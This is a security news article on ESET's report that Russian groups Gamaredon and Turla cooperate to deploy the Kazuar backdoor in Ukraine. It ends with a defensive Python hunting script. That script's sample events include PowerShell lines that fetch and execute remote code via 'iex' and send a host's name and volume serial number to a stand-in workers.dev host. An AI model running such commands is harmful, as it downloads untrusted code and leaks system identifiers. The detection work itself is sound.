ESET: Gamaredon and Turla Coordinating Campaign Targets Ukrainian Institutions, Deploying Kazuar Backdoor

Cybersecurity researchers have identified what they describe as a convergence between two Russian hacking groups, Gamaredon and Turla, in campaigns aimed at Ukrainian entities. The effort, researchers say, signals active cooperation between the groups to access targeted machines and deploy the Kazuar backdoor. ESET researchers attributed the collaboration to the evolving threat landscape surrounding the conflict in Ukraine.

The evidence, uncovered by ESET, shows Gamaredon’s toolset, including PteroGraphin and PteroOdd, being used to initiate Turla’s Kazuar backdoor on an endpoint in Ukraine in February 2025. The researchers characterize this as a clear indication that Turla is leveraging Gamaredon access to reach specific machines and deliver Kazuar.

“PteroGraphin was used to restart the Kazuar v3 backdoor, possibly after it crashed or was not launched automatically,” ESET said in a report. “Thus, PteroGraphin was probably used as a recovery method by Turla.”

In separate incidents in April and June 2025, ESET said it detected the deployment of Kazuar v2 through two additional Gamaredon families tracked as PteroOdd and PteroPaste, underscoring a broader toolkit being used to stage the intrusion.

Gamaredon (also known as Aqua Blizzard and Armageddon) and Turla (aka Secret Blizzard and Venomous Bear) have long been linked to Russia’s security apparatus, with investigators noting their focus on Ukrainian targets in recent months. ESET cautioned that Russia’s 2022 invasion of Ukraine likely accelerated this convergence, as the attackers shifted to high‑value defense-sector targets within Ukraine.

Kazuar, Turla’s staple implant, has been evolving for years. It has historically leveraged Amadey bots to deploy a backdoor called Tavdig, which then drops a .NET‑based payload. Early Kazuar activity has been observed as far back as 2016, according to Kaspersky’s SecureList. The latest Kazuar variants – v2 and v3 – are described by researchers as sharing the same codebase, with Kazuar v3 containing roughly 35% more C# lines and introducing new transport methods over WebSocket and Exchange Web Services.

The attack chain described by ESET shows Gamaredon deploying PteroGraphin to fetch a PowerShell downloader, which then retrieves a payload from the Telegraph channel to execute Kazuar. The payload also collects the victim’s computer name and the system drive’s volume serial number, which are exfiltrated to a Cloudflare Workers sub-domain before Kazuar is launched. In February 2025, investigators observed that Kazuar was already present on the system, suggesting timelines consistent with the campaign described by ESET.

In another development, ESET said it identified a separate Kazuar v2 sample in March 2025, and later a June 2025 branch where Kazuar v2 was dropped from PteroPaste via a PowerShell downloader named ekrn.ps1 onto two Ukrainian machines. The use of the name ekrn appears to be an attempt to masquerade as the legitimate binary associated with ESET’s products. Analysts said the developments point to a coordinated effort by the two groups to gain footholds and expand Kazuar deployment.
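For defenders, the two chains above (a PowerShell downloader fetching from Telegraph, host identifiers posted to a Cloudflare Workers sub-domain, and a script masquerading as ekrn) translate into a few hunting rules. The following is an added example, not ESET’s code or detection logic: it assumes telegra.ph and workers.dev as the hosting domains, a simple `timestamp|process image|command line` event format, and constructed sample events rather than real telemetry.

```python
import re

# Constructed sample events (not from the ESET report): timestamp|image|command line.
SAMPLE_EVENTS = [
    "2025-06-11T08:02:13Z|powershell.exe|iwr https://telegra.ph/constructed-page-01 | iex",
    "2025-06-11T08:02:15Z|powershell.exe|$sn=(Get-CimInstance Win32_LogicalDisk "
    "-Filter \"DeviceID='C:'\").VolumeSerialNumber; "
    "iwr https://example-sub.workers.dev/$env:COMPUTERNAME/$sn",
    "2025-06-11T08:02:20Z|powershell.exe|-ExecutionPolicy Bypass -File C:\\Users\\Public\\ekrn.ps1",
    "2025-06-11T08:05:00Z|powershell.exe|Get-Process | Sort-Object CPU",
    "2025-06-11T08:06:00Z|C:\\Program Files\\ESET\\ESET Security\\ekrn.exe|service start",
]

# Assumed domains: telegra.ph for Telegraph pages, *.workers.dev for Cloudflare Workers.
TELEGRAPH_RE = re.compile(r"https?://telegra\.ph/", re.I)
WORKERS_RE = re.compile(r"https?://[a-z0-9.-]+\.workers\.dev", re.I)
# Host identifiers the report says are collected before Kazuar launches.
HOST_ID_RE = re.compile(r"VolumeSerialNumber|COMPUTERNAME", re.I)
# The genuine ESET binary is ekrn.exe; a PowerShell script named ekrn is the masquerade.
EKRN_PS1_RE = re.compile(r"\bekrn\.ps1\b", re.I)


def classify(event):
    """Return the names of the hunting rules an event triggers (empty list if none)."""
    _ts, image, cmd = event.split("|", 2)
    hits = []
    if image.lower().endswith("powershell.exe"):
        if TELEGRAPH_RE.search(cmd):
            hits.append("telegraph_download")
        # Only flag a Workers URL when it is paired with host-identifier collection,
        # since workers.dev alone hosts plenty of legitimate services.
        if WORKERS_RE.search(cmd) and HOST_ID_RE.search(cmd):
            hits.append("workers_dev_host_id_exfil")
        if EKRN_PS1_RE.search(cmd):
            hits.append("ekrn_masquerade_script")
    return hits


def scan(events):
    """Return (timestamp, rules) for every event that triggers at least one rule."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((event.split("|", 1)[0], hits))
    return findings
```

Run against the sample events, `scan` flags the first three lines and leaves the benign PowerShell command and the genuine ekrn.exe service start alone.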

“We now believe with high confidence that both groups – separately associated with the FSB – are cooperating and that Gamaredon is providing initial access to Turla,” said ESET researchers Matthieu Faou and Zoltán Rusnák.